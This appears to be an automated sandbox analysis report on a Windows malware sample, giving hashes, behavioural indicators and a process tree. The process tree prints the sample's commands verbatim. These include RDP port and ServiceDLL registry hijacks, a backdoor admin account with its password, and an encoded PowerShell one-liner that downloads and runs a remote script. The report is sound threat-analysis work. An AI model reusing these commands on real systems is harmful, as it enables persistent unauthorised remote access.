Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
10-10-2021 20:55
Static task
static1
Behavioral task
behavioral1
Sample
5t6yujh.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
5t6yujh.exe
Resource
win10v20210408
General
-
Target
5t6yujh.exe
-
Size
5.7MB
-
MD5
211ca7c8d5fd20f7dcaebdbe354662be
-
SHA1
1111e864f3e9d2e6879c5179c4136638b05b67c9
-
SHA256
aefb4a2472f0517d58cae7e5e0c9c51b4e36b39f6096dbffc6b8cc18d0be7175
-
SHA512
d7e6e638cdfd4792a09d671f4e61de715a63a9001283594e6c73d5a88dfc8b91d201fc19b1228b7b1a654f9abb8cf52893d3cc02aea142a1c5c7b9d3f876e24f
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid Process 28 3924 powershell.exe 30 3924 powershell.exe 31 3924 powershell.exe 32 3924 powershell.exe 34 3924 powershell.exe 36 3924 powershell.exe 38 3924 powershell.exe 40 3924 powershell.exe 42 3924 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule behavioral2/files/0x000300000001ab53-356.dat upx behavioral2/files/0x000200000001ab54-357.dat upx -
Loads dropped DLL 2 IoCs
Processes:
pid Process 1912 1912 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc Process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc Process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1BF6.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1C57.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_degmda4c.xne.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1B78.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1C36.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_rxdfu01y.eap.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1C07.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 34 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 30 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 31 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 32 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 3788 powershell.exe 3788 powershell.exe 3788 powershell.exe 4064 powershell.exe 4064 powershell.exe 4064 powershell.exe 3296 powershell.exe 3296 powershell.exe 3296 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 3924 powershell.exe 3924 powershell.exe 3924 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid Process 612 612 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 1472 powershell.exe Token: SeDebugPrivilege 3788 powershell.exe Token: SeIncreaseQuotaPrivilege 3788 powershell.exe Token: SeSecurityPrivilege 3788 powershell.exe Token: SeTakeOwnershipPrivilege 3788 powershell.exe Token: SeLoadDriverPrivilege 3788 powershell.exe Token: SeSystemProfilePrivilege 3788 powershell.exe Token: SeSystemtimePrivilege 3788 powershell.exe Token: SeProfSingleProcessPrivilege 3788 powershell.exe Token: SeIncBasePriorityPrivilege 3788 powershell.exe Token: SeCreatePagefilePrivilege 3788 powershell.exe Token: SeBackupPrivilege 3788 powershell.exe Token: SeRestorePrivilege 3788 powershell.exe Token: SeShutdownPrivilege 3788 powershell.exe Token: SeDebugPrivilege 3788 powershell.exe Token: SeSystemEnvironmentPrivilege 3788 powershell.exe Token: SeRemoteShutdownPrivilege 3788 powershell.exe Token: SeUndockPrivilege 3788 powershell.exe Token: SeManageVolumePrivilege 3788 powershell.exe Token: 33 3788 powershell.exe Token: 34 3788 powershell.exe Token: 35 3788 powershell.exe Token: 36 3788 powershell.exe Token: SeDebugPrivilege 4064 powershell.exe Token: SeIncreaseQuotaPrivilege 4064 powershell.exe Token: SeSecurityPrivilege 4064 powershell.exe Token: SeTakeOwnershipPrivilege 4064 powershell.exe Token: SeLoadDriverPrivilege 4064 powershell.exe Token: SeSystemProfilePrivilege 4064 powershell.exe Token: SeSystemtimePrivilege 4064 powershell.exe Token: SeProfSingleProcessPrivilege 4064 powershell.exe Token: SeIncBasePriorityPrivilege 4064 powershell.exe Token: SeCreatePagefilePrivilege 4064 powershell.exe Token: SeBackupPrivilege 4064 powershell.exe Token: SeRestorePrivilege 4064 powershell.exe Token: SeShutdownPrivilege 4064 powershell.exe Token: SeDebugPrivilege 4064 powershell.exe Token: SeSystemEnvironmentPrivilege 4064 powershell.exe Token: SeRemoteShutdownPrivilege 4064 powershell.exe Token: SeUndockPrivilege 4064 powershell.exe Token: SeManageVolumePrivilege 4064 powershell.exe Token: 33 4064 powershell.exe Token: 34 4064 powershell.exe Token: 35 4064 powershell.exe Token: 36 4064 powershell.exe Token: SeDebugPrivilege 3296 powershell.exe Token: SeIncreaseQuotaPrivilege 3296 powershell.exe Token: SeSecurityPrivilege 3296 powershell.exe Token: SeTakeOwnershipPrivilege 3296 powershell.exe Token: SeLoadDriverPrivilege 3296 powershell.exe Token: SeSystemProfilePrivilege 3296 powershell.exe Token: SeSystemtimePrivilege 3296 powershell.exe Token: SeProfSingleProcessPrivilege 3296 powershell.exe Token: SeIncBasePriorityPrivilege 3296 powershell.exe Token: SeCreatePagefilePrivilege 3296 powershell.exe Token: SeBackupPrivilege 3296 powershell.exe Token: SeRestorePrivilege 3296 powershell.exe Token: SeShutdownPrivilege 3296 powershell.exe Token: SeDebugPrivilege 3296 powershell.exe Token: SeSystemEnvironmentPrivilege 3296 powershell.exe Token: SeRemoteShutdownPrivilege 3296 powershell.exe Token: SeUndockPrivilege 3296 powershell.exe Token: SeManageVolumePrivilege 3296 powershell.exe Token: 33 3296 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
5t6yujh.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid Process procid_target PID 1404 wrote to memory of 1472 1404 5t6yujh.exe 74 PID 1404 wrote to memory of 1472 1404 5t6yujh.exe 74 PID 1472 wrote to memory of 1812 1472 powershell.exe 76 PID 1472 wrote to memory of 1812 1472 powershell.exe 76 PID 1812 wrote to memory of 2092 1812 csc.exe 77 PID 1812 wrote to memory of 2092 1812 csc.exe 77 PID 1472 wrote to memory of 3788 1472 powershell.exe 78 PID 1472 wrote to memory of 3788 1472 powershell.exe 78 PID 1472 wrote to memory of 4064 1472 powershell.exe 81 PID 1472 wrote to memory of 4064 1472 powershell.exe 81 PID 1472 wrote to memory of 3296 1472 powershell.exe 83 PID 1472 wrote to memory of 3296 1472 powershell.exe 83 PID 1472 wrote to memory of 3912 1472 powershell.exe 85 PID 1472 wrote to memory of 3912 1472 powershell.exe 85 PID 1472 wrote to memory of 3164 1472 powershell.exe 86 PID 1472 wrote to memory of 3164 1472 powershell.exe 86 PID 1472 wrote to memory of 1068 1472 powershell.exe 87 PID 1472 wrote to memory of 1068 1472 powershell.exe 87 PID 1472 wrote to memory of 1524 1472 powershell.exe 88 PID 1472 wrote to memory of 1524 1472 powershell.exe 88 PID 1524 wrote to memory of 344 1524 net.exe 89 PID 1524 wrote to memory of 344 1524 net.exe 89 PID 1472 wrote to memory of 2160 1472 powershell.exe 90 PID 1472 wrote to memory of 2160 1472 powershell.exe 90 PID 2160 wrote to memory of 3980 2160 cmd.exe 91 PID 2160 wrote to memory of 3980 2160 cmd.exe 91 PID 3980 wrote to memory of 1260 3980 cmd.exe 92 PID 3980 wrote to memory of 1260 3980 cmd.exe 92 PID 1260 wrote to memory of 2112 1260 net.exe 93 PID 1260 wrote to memory of 2112 1260 net.exe 93 PID 1472 wrote to memory of 3004 1472 powershell.exe 94 PID 1472 wrote to memory of 3004 1472 powershell.exe 94 PID 3004 wrote to memory of 3416 3004 cmd.exe 95 PID 3004 wrote to memory of 3416 3004 cmd.exe 95 PID 3416 wrote to memory of 3064 3416 cmd.exe 96 PID 3416 wrote to memory of 3064 3416 cmd.exe 96 PID 3064 wrote to memory of 3616 3064 net.exe 97 PID 3064 wrote to memory of 3616 3064 net.exe 97 PID 2104 wrote to memory of 3308 2104 cmd.exe 101 PID 2104 wrote to memory of 3308 2104 cmd.exe 101 PID 3308 wrote to memory of 2132 3308 net.exe 102 PID 3308 wrote to memory of 2132 3308 net.exe 102 PID 3580 wrote to memory of 892 3580 cmd.exe 105 PID 3580 wrote to memory of 892 3580 cmd.exe 105 PID 892 wrote to memory of 3296 892 net.exe 106 PID 892 wrote to memory of 3296 892 net.exe 106 PID 2936 wrote to memory of 1520 2936 cmd.exe 109 PID 2936 wrote to memory of 1520 2936 cmd.exe 109 PID 1520 wrote to memory of 1268 1520 net.exe 110 PID 1520 wrote to memory of 1268 1520 net.exe 110 PID 4016 wrote to memory of 3912 4016 cmd.exe 113 PID 4016 wrote to memory of 3912 4016 cmd.exe 113 PID 3912 wrote to memory of 3164 3912 net.exe 114 PID 3912 wrote to memory of 3164 3912 net.exe 114 PID 604 wrote to memory of 504 604 cmd.exe 117 PID 604 wrote to memory of 504 604 cmd.exe 117 PID 504 wrote to memory of 2840 504 net.exe 118 PID 504 wrote to memory of 2840 504 net.exe 118 PID 1376 wrote to memory of 1972 1376 cmd.exe 121 PID 1376 wrote to memory of 1972 1376 cmd.exe 121 PID 1972 wrote to memory of 3600 1972 net.exe 122 PID 1972 wrote to memory of 3600 1972 net.exe 122 PID 2904 wrote to memory of 844 2904 cmd.exe 125 PID 2904 wrote to memory of 844 2904 cmd.exe 125
Processes
-
C:\Users\Admin\AppData\Local\Temp\5t6yujh.exe"C:\Users\Admin\AppData\Local\Temp\5t6yujh.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cl0utud4\cl0utud4.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB396.tmp" "c:\Users\Admin\AppData\Local\Temp\cl0utud4\CSC1C0B95F9BF8B4ABEAD5C3A512DFC798E.TMP"4⤵PID:2092
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3296
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:3912
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:3164
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1068
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:344
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2112
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3616
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:4012
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:3004
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:3308 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:2132
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc Qlhdaxqa /add1⤵
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc Qlhdaxqa /add2⤵
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc Qlhdaxqa /add3⤵PID:3296
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:1268
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵PID:3164
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:604 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:504 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:2840
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc Qlhdaxqa1⤵
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc Qlhdaxqa2⤵
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc Qlhdaxqa3⤵PID:3600
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
PID:844
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:2160
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
PID:4012
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1360
-
